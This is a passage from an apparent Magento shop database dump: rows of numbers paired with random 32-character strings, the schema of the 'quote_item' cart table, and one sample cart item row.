(834, 1164, 'rj7yNQayQ66I59PNoxhILbLTbxno90NV'),
(209, 523, 'rJHdmIOfEPf9LKpO1nuIYG9XW8tFMvGk'),
(445, 770, 'RJU8PXytsJGONwPtqHXZfFVjr1pyrnRe'),
(542, 867, 'RJyl28PgD2KUpbccmQZIAn8bsyULQlWF'),
(254, 576, 'Rml754Mb7FrhCc7h8wRI1lC4P78C0c9Z'),
(667, 994, 'rMzxyhCfjGVHGNM2fhH0Mx8mENI4wxcv'),
(647, 974, 'RrBrg0nRjZadeLiwkjn6LPuPG4bvf8XM'),
(596, 921, 'RTBkCTcqWmstKUR4vbP25Dhd0GXDd9ng'),
(557, 882, 'rtrsFMurIzY3IA6iDuipAdqx739QetD2'),
(345, 669, 'rvBQT5GTP1dcNrxMzBJav1piTDTUub4T'),
(155, 459, 'RxLGdctM8741Jq9UjPTq8w3zO1OMNxvo'),
(757, 1085, 'RXmznxSnJc2BEUBYnZZSNgR2vLlkOpCw'),
(531, 856, 'RyADJZXMOJfGEnjz51xa01s0tDX9c3i9'),
(246, 568, 'ryDAYS4Q5KNdYkLkdZBEHQ7VQX3OpciB'),
(503, 828, 'S0KxqPGs3o25gb8iBeDVZfBhUzOrXXn2'),
(247, 569, 's0szuSEfmfI61GlRq22NeigB5Vy36pDn'),
(811, 1141, 's1uhYHBAcUmy4dyL0hJrznS9g4YUkMEw'),
(117, 410, 'S50rJTEncxIbduZLxxz2NpsrzqHaYiPK'),
(629, 954, 'S7fZ2lv6471fk5zJbgI9W3PD2u7lhsEh'),
(405, 730, 's8iVh1CgyofGNuPx5UUHOulCbxbHIoBG'),
(369, 694, 's8S8OS4Kpep87wbSQiQvHuHdd29zrw8P'),
(919, 1252, 'sa4znNkLAR7qeJMjWzsx4PZBTt4wJNjW'),
(377, 702, 'sBy2cVO0C81rHuCHUn4kAz9SGXiN3Xrl'),
(175, 482, 'sC81fOJBePbzZAL3QdzE6TodHTUhXB7H'),
(559, 884, 'ScfRiGL2snXPVVojpcSPBgTkpcGI1qAB'),
(891, 1224, 'ScpNWcy5BDY2b7B067Dn5j2XQuR3qNkc'),
(619, 944, 'SDusMZ525nEdqCtLOG0fipuCP6v7Lmhk'),
(898, 1231, 'SdxlJ2HunQLzhsrAZEGqhopuzvyRwqyh'),
(37, 94, 'sgFwAIeebeuWZFqZlWrvgSh76dxZlUv6'),
(161, 465, 'sh9PnDVjk5TAV1tZUptaEnBMEIpEmh09'),
(12, 17, 'sHzxF7sMo3SMqbkKnVSPxVPrne1B8gR1'),
(968, 1301, 'SI3YCuhtTUpfUPj32zwzWJFrw6eUflzo'),
(702, 1029, 'Sin7aw1LW0R8t6tCR0dASuEuGYRIJXoP'),
(29, 60, 'sjp10k9z2JbwF1E89we3zQyIoJbelTck'),
(807, 1137, 'SJUAF6nc4pUjdgM8yhcetN43B7gZc3Av'),
(475, 800, 'slMIsTRQuzb91NWSfxCHhs2JUZpf6iyc'),
(887, 1220, 'SmdietMzHzGlJQIMQPfiy7y5ua3mOvak'),
(781, 1110, 'sPFvEFUVCORtVTh2VP8IFlj8JMdTgz6q'),
(812, 1142, 'sPNKIX2d0FJeqdkU4oQya217ns8tKAE6'),
(709, 1036, 'sq85SEQyxobvwpKlK3moL0diIYRWCt4y'),
(883, 1216, 'SRar9agooIub2Ux6QNq3JbmK8Qh1miLp'),
(641, 967, 'ssaRHs3WWLIFeYPlt0a4PyrKnmmPerqq'),
(93, 373, 'sSHkLj2fBCqmdO2U4frXLvY2uNL2lujX'),
(696, 1023, 'sSWc6ZQp6B1lMnAQaNdjJFKIHyqlwgbN'),
(651, 978, 'sUjox5U7dxcELb1w5uOVqteVPxUOI12c'),
(174, 481, 'swesSnp1KR2SWdr3wRgiNQ3BlJcTvDBT'),
(796, 1126, 'swtDayDCPeYOKu0Su1JJNM9BurZlyiFs'),
(556, 881, 'sWxJbuW2hMCod4rPCgKJ3PFrgkHy2WZz'),
(607, 932, 'sXHICe97hCOunVlCYYM4fs4vS4qWzF54'),
(125, 418, 'SxJFyebl9B2RWbViA4MmHussAHrSipbH'),
(792, 1122, 'SXuJKtjVUOqhEBEpJudYt0msnwbJUc5D'),
(32, 86, 'SZgjfg3giVisXhxU205k44rSEnGSuph2'),
(541, 866, 'T659t3ZKFpCFd9kXJgk9Ny5LRA9K0NpD'),
(693, 1020, 'T6l9DUFBBjhYj5GjK4O4vw7Egz2bXAUV'),
(600, 925, 't6tUSs4wEfZwEND8IER9xRPmQfNUP6JU'),
(19, 31, 'TFyjCZCVC3bkaGbWSUeL4tozABD8u1wr'),
(33, 87, 'tgtNLpPNACSK7AsHnJvOAmszcn4iF44I'),
(63, 320, 'TGXJ1EXyzWOyVBR3LqYBMeAke1w6keJc'),
(182, 489, 'thbY7Zdi8PjZABCHdzdeQQaoTIOR0pZL'),
(808, 1138, 'thoyxKjGACMC6fTNIv2yX44vvHXhCJBo'),
(326, 648, 'Ti65FOb0JYtpXXJrEm7NuiqvGeV7QpiC'),
(588, 913, 'TIoiNpXOzLMujGrekWhUWFTNrw05aXhr'),
(644, 971, 'TIVncKrkz8BFnl0hjMjfxcwsWP11iPFE'),
(69, 332, 'tJX2qO1AVT36KYSUQgR2IFJKddacvyEA'),
(886, 1219, 'tK6wuJJZQxWC4eqlNwKdMkpSBnTvY32y'),
(938, 1271, 'tkOz6c3FFY3PPiWiCk8Rk1n3MuO9Ajbz'),
(893, 1226, 'tMTbGXVZjLNl133TUxUu3deKRPeoxG7k'),
(142, 445, 'Tmy0V4mqVWswtW6MQLJlEq3tJYklJyMh'),
(43, 102, 'TNsxEzJPnp43x0TmJVkJhuGoLccLuj9K'),
(403, 728, 'TogDu4at3uMKaE1cwyl1T1nc5sdCYye6'),
(680, 1007, 'tOXJ9aM3QvGvYQ408VBbGUmRJmQ3XGGr'),
(378, 703, 'tqaNGNBP9expLGF0McSQVniFHNvDgAWZ'),
(950, 1283, 'tqifQhK8sA42S2WdOblVgtQx28EYywlj'),
(312, 634, 'tRiqdzYnoLWliG0KbXDPN74lQHSVbg66'),
(560, 885, 'trjP7jDiY1TwuUAKYoxPVbel1jnygjD0'),
(224, 540, 'trxFpQBIOlAL5Di4P4GtLP1H2csqYHOl'),
(769, 1097, 'ttoY0Ai7TQLiXGnpUo1hTDgy4IlyIqKH'),
(606, 931, 'TVk8nCfAklW9JdvbnR1kaEw3Ti6eoORE'),
(413, 738, 'tYvD00pMHonJKKfbrgb5kW3IRf2cJTSq'),
(469, 794, 'u0X46xJTNRIYoSwKx8EeBSpEHhkFkHVC'),
(578, 903, 'U2f1XVa7Bb9FZgDfjZaBoIiuMLENrsr1'),
(726, 1053, 'U47tlVyXBUhhLz1HvnfZktAuMu0LsvIQ'),
(535, 860, 'u4H0ASmr82bQI0yegH20DNOvaoYlHHB7'),
(105, 396, 'U4qFnEWSeuiHyaGtQDL0yZInqiqz5ASX'),
(678, 1005, 'U9fVTp89kTKoBNJttqeB05bHrMflwjNk'),
(70, 331, 'uaz8af4O8iiHYAXTHy6K7AysnPdqONPf'),
(776, 1105, 'UdvEqUAMlWv5RIAfYy3udBRRGEy5g5IB'),
(256, 578, 'UegTpwQIJp3rl1niE7LBhv5ZhZvCLc7V'),
(861, 1192, 'UEWX9Q4HjDv6yqevDHeadu4J8dcCqvk0'),
(833, 1163, 'UfhmnYT5dFLjsouRggOxUuQU1wgjMKQr'),
(111, 403, 'UFrruFl96PE43Vzd0e5PufhZIgf7Ru7i'),
(483, 808, 'ug0ULZ9cAvOTyYN5VXbRirNn83WUfYBI'),
(748, 1076, 'uGHPEprZpTTH1XK7vB4pKZ7WZwh8qdS5'),
(214, 528, 'uHugOMuF5vpGguzcwZtdwpC9qj9loPgw'),
(582, 907, 'uIUjpJaFZ8P4xEDyGXqR8LCYbfsnHOa5'),
(36, 93, 'ukXzFrpGq6tQjS4e36eRdbyxuzGF3uT2'),
(9, 14, 'uN5XRDYNRKoOat7oxxgLWNQtjQYAhkkA'),
(747, 1075, 'UoBIVrnz8c9aUoNTQBm5Yhg0Djokfghy'),
(628, 953, 'uOUMi8L2TskpLdlPsvIDJZsX4Df8u2UH'),
(710, 1037, 'UpbUBMpkWcQCByoJjbv0S7HusFcdy6NT'),
(817, 1147, 'UPpp1z1nVwgPcAjtmXN83IAVOed7knE5'),
(414, 739, 'UQAmPstQv8KbjVL2ZlXd5VcEMEgh3fVH'),
(26, 39, 'urWp3FGRFtDDwepgUo8cpy7cVM7lVzo3'),
(238, 558, 'uTbXD9I6tjxmZJ0HuUbC7cg0CzPJxHl9'),
(520, 845, 'uVVLjXL74nBpnZdOJ6sbc5cblrUbzOFB'),
(428, 753, 'uWcfaWzRIQqdUFT4Q789Cxj7pQlrdMr1'),
(904, 1237, 'uX0Okvo4ak40cHiwrGEumIXw9BOqDmfp'),
(205, 513, 'uxgPUFnBtpOvNHaYYIBfBjgBhf18010y'),
(844, 1174, 'uYAVQUrFCR4A4hBoP9hiqKwsxjZffB8j'),
(532, 857, 'uyD4ZX7ecrmKzqCbjVv4pi1W1cbamwg3'),
(841, 1171, 'uYWhlhgTyOtNoiXIwZ0A6zGnWozDBeGU'),
(873, 1205, 'UZMr2xZoUalM3VQlh2JO7ONaX8oAEhmg'),
(959, 1292, 'v2XDXjLpDvd4Q4CWluxEw5WirU29CDlU'),
(461, 786, 'v3uimFzN7XOReLdRJImTnievNXt8prij'),
(365, 689, 'v5T9L1oAGLnXAII8p8tBjtqLBJZ28n3m'),
(334, 658, 'V8JgBK82P6wxYvJGvUQ4menbes4apyvW'),
(42, 101, 'v8z4CcZzomO9uSceOe8oYPScYNdHexZU'),
(506, 831, 'vaUuUyxQMVWi6jV7LKD6utOMv13VxTPO'),
(402, 727, 'vbHG1Nv5bmj8qCoizcTGeEGMADitIoy5'),
(243, 565, 'VBpCIkIrbctQAFQetOJZzOE0SNbEjvtJ'),
(646, 973, 'vDB4DhY9byzYjEtuh28SLfkWqZgnUmUS'),
(316, 638, 'VdjPUYbZdYqg5hM9cI9qFsg6RAUwASwB'),
(213, 527, 'VdkewDsZPNlwy8uCu8bOVa61YvyyDEif'),
(322, 644, 'vF7DAoOvAlgORpbvKy3gG8QPdoTEaqFU'),
(106, 397, 'vGYxfdIorD1uOMwmGMi8A8c5RGNysLya'),
(253, 575, 'vh1Zlp0JE2KFYeVqkhAUhLRf9VDyggmD'),
(720, 1047, 'vHHyJbl7ffMJBs6ROKymwx7Jg7iZWo2C'),
(101, 385, 'vhRxKhfTns86BL4x7EIqnndYg0QHlRyP'),
(683, 1010, 'viAznHQMmBqXfC0AHOsyVfwP7VF1NphB'),
(778, 1107, 'VIqGTbLWKn89aE7rGg0c13dXDZ25hH7v'),
(610, 935, 'VIQJ5WAk7gR8DyV9gnXdXU0oRvbM9ZKB'),
(594, 919, 'vjK1icP6qvijmnS0O3QcxleCO8uKnaQP'),
(550, 875, 'vk44WGHAp41Ij5pyE1Gi62DX9EY2v0zb'),
(39, 98, 'VkMGFenaxFqInV0OeK7X5qgokggQfZ9l'),
(441, 766, 'VlG6mcp5DOwawyj00U6wHgYfsZwqHdz1'),
(51, 110, 'VMfnjeWfN0lexbFWhOLrCcHflzqo7SFO'),
(470, 795, 'vndCmf0QQ4lSsDmuGXWn5jwGWBNhS3QG'),
(941, 1274, 'VoJrKaEGCsh4gRjaspGXDsAesIlzcFvT'),
(576, 901, 'VpwiZd1ROMLadqRWbjMkcWCwrATJw9MG'),
(682, 1009, 'vQaQ5NGVHbj1AIhxSakMfM5UwrPc4bXK'),
(199, 506, 'vsPC32vgrPf6jXs8z9RqF2EzIrzdI8Tk'),
(969, 1302, 'VusCu65Q2AHgkK3ZBw5fiSj1DLJmkum6'),
(291, 613, 'vwE3gY5qCEwvHLfwdcTDxoA7874TbJWY'),
(572, 897, 'vZUtZdnJlNLtoxLadl6cGNSVKYkDK0cB'),
(472, 797, 'w06k1wkBdFD9nI5coE5F795dHokCUpgU'),
(425, 750, 'w2nGBqfyFMoGBviB1vK8yVulKRkEEZ4t'),
(495, 820, 'W4yUn9rEJBkU7cFn8BZOnpZ0yq0qBxbb'),
(181, 488, 'w6C7Z8hk9wIwWEqbvj2wCuvNazwOlZtu'),
(324, 646, 'W7pKD7Ia5YlgCAsmaYpV4t0BOFOE1UTD'),
(8, 11, 'WarqjUjTwkX5yPe9HhVR7tUTGjrG5AxF'),
(456, 781, 'wBrhajv9n9ssNnixsmjJaIyvSJLXFWwW'),
(818, 1148, 'WcKOjuhvjolZseVwsNsy7l3JvwfoJ6XS'),
(137, 439, 'wCys52o50KP0aia2552zaogXs7mDKMVy'),
(915, 1248, 'WGaOFdWxFdNiKTnkbhzYeDR7q5obIVHc'),
(61, 318, 'WgtNXQxGt5Ao4ReDMnqrVOSWd6F0L829'),
(774, 1103, 'WH5ZBSD5SxIzra6d9hVHBorB3VEWbB5Y'),
(775, 1104, 'wknM2eYJsBnkOjgqkQpcm5IVQ6vc41Xt'),
(110, 402, 'WkzZ4USzH9ijFQJIqxQOz9E4WMm2lf3w'),
(85, 350, 'WM2QmZkc0lTn7elBYJ05GkETBZ1JMXTG'),
(249, 571, 'wM7MbGti8gulSnQCJCKDAm49NekPtdNh'),
(867, 1198, 'WmcsJr2pciJCSpdLqsAiyDe9w3KIOcCo'),
(257, 579, 'WnH3Ho2izS6OlcGOl7UmvABCK62ZeDus'),
(375, 700, 'WOMekgo3XtbcnOWY3vKDWBR0wOqUH5Kg'),
(264, 586, 'WPpxpxrCHVr1WR3LJfsGYS9NFc8zMgiv'),
(584, 909, 'WprgjaCbaZPv3wHUe4bkwn73L2nAw5aJ'),
(292, 614, 'wPwQSLWilvQ9AjEqqlJpYH3bBDIA11xo'),
(940, 1273, 'wqmzRqhJqXismVXX137X5PDBg5wovXtd'),
(204, 511, 'WQNVtqAqn8iqCGKrspEzE3kKBaA2QZUh'),
(1, 3, 'wR9BX3s86ySc1S8lgqoqqiDYo3ApogvJ'),
(502, 827, 'WRiYdyWRaRV18q3YLC52GENUKt6rBVfo'),
(16, 25, 'WrlDamGq6er7Yr1pynole4FT8y7kqju3'),
(896, 1229, 'WT4WiutdcV7RAyyZrg4hvdOvf5vzUGQo'),
(836, 1166, 'wTkXzNURYRPikX39RdLbhZSjRJITumid'),
(505, 830, 'wUVfUr2OrhGM1wYGsrAeRbCBBn9PcuP5'),
(400, 725, 'WvKBaUerfOwGQdaH5VHSDscLU9TCfXFH'),
(121, 414, 'WWmX7JcKl88lY4qFG3V5fIrgKHUVSPRs'),
(433, 758, 'wxdTarjIzevwJtie1MzwE8h9OZY3R2MM'),
(81, 346, 'Wy2KijvEny4YuNup1KAT4ZB0W8S3SGLv'),
(707, 1034, 'X1plpEnW5uqObd3hK38uubli4SoJXaiV'),
(496, 821, 'XdmMsRTBdv14apMIQIoAgtTqN48JJDGS'),
(845, 1175, 'xdRpFU2z3TFjAIvxmWD8SorxdA6bu7Bx'),
(672, 999, 'Xduf0HvSekVigQJTnvaawOygkMPFjJmZ'),
(10, 15, 'xEcopwcUtxOxWcdXbEIaFJLv5mXPkUd7'),
(777, 1106, 'xEfNFDNCLnWNRKJRNZUUEb8PmSyVKvks'),
(499, 824, 'XFNgZc1sdPmbzDN1ZyFrgJ3maLoTn7O1'),
(634, 959, 'XfZkzPJ5c7fwLuUxKYfDGPo1c0D1Wyca'),
(527, 852, 'xgUdw7gspdNOtPruBHimcE4wJcFVZqLj'),
(764, 1092, 'xhhJCgaGoarUYQhl6Z0tQekLuFDAKxDu'),
(159, 463, 'xi5EBMYCcyHBsDZC0bD581rmcHkLZkVm'),
(17, 27, 'Xj14tVSzWk47sHCN986ypk9KzC5aQbeK'),
(360, 684, 'xKokYCI0SMtzq0B7t3AUgHmeVJktS5vD'),
(510, 835, 'XLYH4UIiLAYt2fZY7iEnvWnv03FrlBmj'),
(922, 1255, 'XMb5mnPLjbpVqO6Woa46d1Ug4H99mDSg'),
(393, 718, 'xnPSaDNePLl8MI0tGRoEjdeD7crAlgoI'),
(717, 1044, 'xoaVEqcLJxkT2ZXrzAdl1RAmzX9YC0Ad'),
(458, 783, 'xpixPC2Pt2bA4EVDEjT8VXvef8xHl6Ta'),
(623, 948, 'XsrRdub0Fn1ElypHq3FGgjoHDO3pfBbW'),
(434, 759, 'xsWmdI6E79O5vDwom84TOL1lZDEP9k2r'),
(473, 798, 'XWh9gwRiYIedc1fbWbari1s2Bix6xn1m'),
(423, 748, 'XYnlCe0bo0uMUh0trWIqVUHVvdTREw2d'),
(190, 497, 'Xzx7m2tRJHEhaAhR9iXlYq2pL9Cmz6AF'),
(856, 1187, 'y09FnR0CYidurWGWgi5Bp4w8BzLNYbkL'),
(272, 594, 'y2JbKBD0mw1eVqK5gbpSAymysCcVzPdR'),
(713, 1040, 'Y2Z8Qs5yUpY98u30PWhS7HVCZGt3Wjy1'),
(306, 628, 'y4iIrRPbZTzTL7yDDAD68mFdvh04Juo7'),
(547, 872, 'y5cM6vn8MWmM2RiskfysMRhJGA1q7hcw'),
(561, 886, 'Y5vNWHUavfYBIGqJ1F7HJ8raODr7BVLo'),
(564, 889, 'y6PHvCqFjmBPjWmp0jdYhEJhxRQi00qp'),
(514, 839, 'y6pJkGpv69wYaJdTHhz7hH4BSLB0lFlI'),
(320, 642, 'Y9QJBtNqTZct0NBulhVfXfixko2xXcgn'),
(599, 924, 'Ya0TazAZApxZQJyP9h3Okv5N3Utn5ZBk'),
(383, 708, 'yaTQnIKl9xDWP9WwtvD6nEXj6HwY1GjH'),
(364, 688, 'YbGeJTCzNXVyZym1CA2AJhoFmdVQkkqV'),
(782, 1111, 'YbVueZjn4miN2Wg9bpHs539uidRYga1K'),
(567, 892, 'yEPCkuH8FTfIPEjVNjqC372xjMTKkVYa'),
(258, 580, 'YeTZOfsbrzTsYX8VbTANgCfE73m2aY45'),
(659, 986, 'YgvpVmBshL2LmZhoYowyIhmlFMVwmorm'),
(544, 869, 'YjuyGQ07Ps9s6OXlS2SqQAyZqs6NaG3i'),
(138, 440, 'yK8B2mTejXXJ96MI8CvvEtgjnhjyxiZV'),
(259, 581, 'YKThuwcDIRAtgFTdSIc3KEkQB1HHMi0r'),
(194, 501, 'ykuTE2Dm9wOfGd2O9uVY26JvT6qdjZns'),
(951, 1284, 'yLdH0WPTRW9RR9h8cwZvx1cahznuBVfJ'),
(656, 983, 'YNjNc3DPpxP2ZaToCUXWjRpAft51KAYP'),
(704, 1031, 'YoLee34bu3lEjz1mThseOwnBrhBMzkY2'),
(591, 916, 'YoQXwPnCNCGJhH7codmumLPkF5l2p89E'),
(219, 533, 'ysmIzKKL5GqynJdmJ2GVNBOOdSPEdABd'),
(674, 1001, 'YUo2c3uc7K3qVS4rPLLL2CG5KsvdVSN0'),
(73, 334, 'YWdD5bZFKu8MRAutEzzSQ8R7hsqcWLyN'),
(280, 602, 'YxMKKKRkPhBeot1duqTQmpHSbZ5Qlg64'),
(185, 492, 'yy8pN2DtZQuY0WM5PPRqCHHqvyhTuc9K'),
(431, 756, 'YYQBhso18ExlRB0TUUUHCRNwHDklQCe3'),
(407, 732, 'YzZcUn7W0tTaxTaUrpqgJ6nvho9hP39o'),
(229, 545, 'z0EGImA8W2bgiG5yaxXmB4FNPrZY22kc'),
(788, 1117, 'Z3u9InQzrqsl6lEg1lE40kwpg5tvi8a7'),
(373, 698, 'Z4U90QWjXvxitOouJovFa95xFGi3MXNj'),
(719, 1046, 'z4Zc5CV5OUFhLHpRDdskNmMDAgu4CyAp'),
(653, 980, 'Z5wjr8LDAo2ziFMFcPxKSgopuVg5B4st'),
(351, 675, 'z69TR29EiCXTCmBimevJVQRYOCIZ3s0j'),
(909, 1242, 'Z6IInEBpeAcBQ6Sr2lLqLA9NJGWPmJCS'),
(735, 1062, 'z8nXXGRmV1PNOxrjTgNevxszhAQKozvD'),
(471, 796, 'Z932VUikdjHaH27ZmKAPvx3BLFKGiSn7'),
(7, 10, 'Z9UMIF7PDRs1z2NEKSDM9ZcKTDoylVHH'),
(53, 121, 'ZC56v9kNHCbWO03XcFXDOjgwm214oD1E'),
(839, 1169, 'ZD5wfHHUN2iVcImCjBMsH6TeHalqP0uI'),
(785, 1114, 'zfCie5qKUpEAbGJJBmZVU8JX110Z7pys'),
(740, 1067, 'zFCsepEt72aUB8QO7H6DPp1AFr0RYJZ8'),
(912, 1245, 'zG24tQjKPIUwrtioIGkGxCkN8wGCDMjO'),
(755, 1083, 'zG85es281SxenLr4N5bzy5KH6IBIWOHl'),
(21, 33, 'ZH1BkOOgyL1MDFJDmSGGCGYO3EtoyFbb'),
(57, 312, 'zhintBXvV6jcEwil6jarDNr4RqY5Rm3O'),
(339, 663, 'ZHTbvsq69miuJu5wk8qmQsAMYb49DHpm'),
(325, 647, 'zHyBmHR99sHXJ8WzSxBmiKKBAeakwtko'),
(695, 1022, 'ZiaEduItRaKIoUHsxJz0LiU0QVmvxGjG'),
(684, 1011, 'zIjupd7S3FTRtwA5DrcanJbNP7J9ptEH'),
(870, 1201, 'zJ1Wz2GpYPUbh51ecp8msKi2XJbCJQrr'),
(657, 984, 'Zj4dqLwOD2T5gZ2MZxbLWTsFo5TKA2IO'),
(654, 981, 'Zja8pAAkbnRvtCQdTGERU8TyrD5qneE2'),
(277, 599, 'ZjtP2ZEZpgCjPLO6LmViJ3RqcPoW36xg'),
(296, 618, 'zkjAI9jzvfWZX6v5UF3RrdQCuFEHW3HP'),
(317, 639, 'zkWYRRkn8qNgQzctm2ZlCVHiytWsvStc'),
(745, 1073, 'zM72zR5BKbYUton0eVEF2vg7hMU5TU2O'),
(132, 429, 'zoDZSufHiTsQabbK558f6G0SHBExfPwy'),
(367, 691, 'zoxYiPfnmPIDU2LmAXWVUqhjhinqKbpq'),
(579, 904, 'zPr5khbR1lXNlE5wa8zAf9JbdOHVcMXX'),
(921, 1254, 'zQ5lMFccUYBoPuYczLcGDVE2gQXXMsBm'),
(163, 467, 'zqgAqBUruZnBq2HwgGSxOfKC0f3YWghm'),
(100, 384, 'ZRiZCaUwoeozdq0MCvoiipERmfWo2atJ'),
(344, 668, 'ZrvUFnfMlVLthm8yCsk2PtjQD4iQU015'),
(389, 714, 'zryU0747pYTMOJLd7XIOG0H0Zf1tLG05'),
(660, 987, 'zUsxcJwauFVF3Vs29A4EcyYZ1I3vZ1Wk'),
(391, 716, 'Zvica9ZaG4m6F8xxInNBnUEjR92ZTvPu'),
(907, 1240, 'ZWFoxYLdinqkBbUP6spXX3NPsqeKWH0A'),
(187, 494, 'Zy0Vlq04NF6C2KxWl1oF5aCdYf3i45Dc'),
(810, 1140, 'zyY1gMzCbPudyFqJtFJveHLet4WTAldG'),
(88, 367, 'ZZ2WChkjDvLL5WdinUgol0vWqoW8y1Pk');

-- --------------------------------------------------------

--
-- Table structure for table `quote_item`
--

CREATE TABLE `quote_item` (
  `item_id` int(10) UNSIGNED NOT NULL COMMENT 'Item ID',
  `quote_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Quote ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  `product_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Product ID',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `parent_item_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Parent Item ID',
  `is_virtual` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Is Virtual',
  `sku` varchar(255) DEFAULT NULL COMMENT 'Sku',
  `name` varchar(255) DEFAULT NULL COMMENT 'Name',
  `description` text DEFAULT NULL COMMENT 'Description',
  `applied_rule_ids` text DEFAULT NULL COMMENT 'Applied Rule Ids',
  `additional_data` text DEFAULT NULL COMMENT 'Additional Data',
  `is_qty_decimal` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Is Qty Decimal',
  `no_discount` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'No Discount',
  `weight` decimal(12,4) DEFAULT 0.0000 COMMENT 'Weight',
  `qty` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Qty',
  `price` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Price',
  `base_price` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Base Price',
  `custom_price` decimal(12,4) DEFAULT NULL COMMENT 'Custom Price',
  `discount_percent` decimal(12,4) DEFAULT 0.0000 COMMENT 'Discount Percent',
  `discount_amount` decimal(20,4) DEFAULT 0.0000 COMMENT 'Discount Amount',
  `base_discount_amount` decimal(20,4) DEFAULT 0.0000 COMMENT 'Base Discount Amount',
  `tax_percent` decimal(12,4) DEFAULT 0.0000 COMMENT 'Tax Percent',
  `tax_amount` decimal(20,4) DEFAULT 0.0000 COMMENT 'Tax Amount',
  `base_tax_amount` decimal(20,4) DEFAULT 0.0000 COMMENT 'Base Tax Amount',
  `row_total` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Row Total',
  `base_row_total` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Base Row Total',
  `row_total_with_discount` decimal(20,4) DEFAULT 0.0000 COMMENT 'Row Total With Discount',
  `row_weight` decimal(12,4) DEFAULT 0.0000 COMMENT 'Row Weight',
  `product_type` varchar(255) DEFAULT NULL COMMENT 'Product Type',
  `base_tax_before_discount` decimal(20,4) DEFAULT NULL COMMENT 'Base Tax Before Discount',
  `tax_before_discount` decimal(20,4) DEFAULT NULL COMMENT 'Tax Before Discount',
  `original_custom_price` decimal(12,4) DEFAULT NULL COMMENT 'Original Custom Price',
  `redirect_url` varchar(255) DEFAULT NULL COMMENT 'Redirect Url',
  `base_cost` decimal(12,4) DEFAULT NULL COMMENT 'Base Cost',
  `price_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Price Incl Tax',
  `base_price_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Base Price Incl Tax',
  `row_total_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Row Total Incl Tax',
  `base_row_total_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Base Row Total Incl Tax',
  `discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Discount Tax Compensation Amount',
  `base_discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Tax Compensation Amount',
  `gift_message_id` int(11) DEFAULT NULL COMMENT 'Gift Message ID',
  `free_shipping` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Free Shipping',
  `weee_tax_applied` text DEFAULT NULL COMMENT 'Weee Tax Applied',
  `weee_tax_applied_amount` decimal(12,4) DEFAULT NULL COMMENT 'Weee Tax Applied Amount',
  `weee_tax_applied_row_amount` decimal(12,4) DEFAULT NULL COMMENT 'Weee Tax Applied Row Amount',
  `weee_tax_disposition` decimal(12,4) DEFAULT NULL COMMENT 'Weee Tax Disposition',
  `weee_tax_row_disposition` decimal(12,4) DEFAULT NULL COMMENT 'Weee Tax Row Disposition',
  `base_weee_tax_applied_amount` decimal(12,4) DEFAULT NULL COMMENT 'Base Weee Tax Applied Amount',
  `base_weee_tax_applied_row_amnt` decimal(12,4) DEFAULT NULL COMMENT 'Base Weee Tax Applied Row Amnt',
  `base_weee_tax_disposition` decimal(12,4) DEFAULT NULL COMMENT 'Base Weee Tax Disposition',
  `base_weee_tax_row_disposition` decimal(12,4) DEFAULT NULL COMMENT 'Base Weee Tax Row Disposition'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Quote Item';

--
-- Dumping data for table `quote_item`
--

INSERT INTO `quote_item` (`item_id`, `quote_id`, `created_at`, `updated_at`, `product_id`, `store_id`, `parent_item_id`, `is_virtual`, `sku`, `name`, `description`, `applied_rule_ids`, `additional_data`, `is_qty_decimal`, `no_discount`, `weight`, `qty`, `price`, `base_price`, `custom_price`, `discount_percent`, `discount_amount`, `base_discount_amount`, `tax_percent`, `tax_amount`, `base_tax_amount`, `row_total`, `base_row_total`, `row_total_with_discount`, `row_weight`, `product_type`, `base_tax_before_discount`, `tax_before_discount`, `original_custom_price`, `redirect_url`, `base_cost`, `price_incl_tax`, `base_price_incl_tax`, `row_total_incl_tax`, `base_row_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `gift_message_id`, `free_shipping`, `weee_tax_applied`, `weee_tax_applied_amount`, `weee_tax_applied_row_amount`, `weee_tax_disposition`, `weee_tax_row_disposition`, `base_weee_tax_applied_amount`, `base_weee_tax_applied_row_amnt`, `base_weee_tax_disposition`, `base_weee_tax_row_disposition`) VALUES
(5, 3, '2020-08-17 11:08:13', '2020-08-17 11:08:13', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 1.0000, 643.0000, 643.0000, NULL, 20.0000, 128.6000, 128.6000, 0.0000, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 643.0000, 643.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
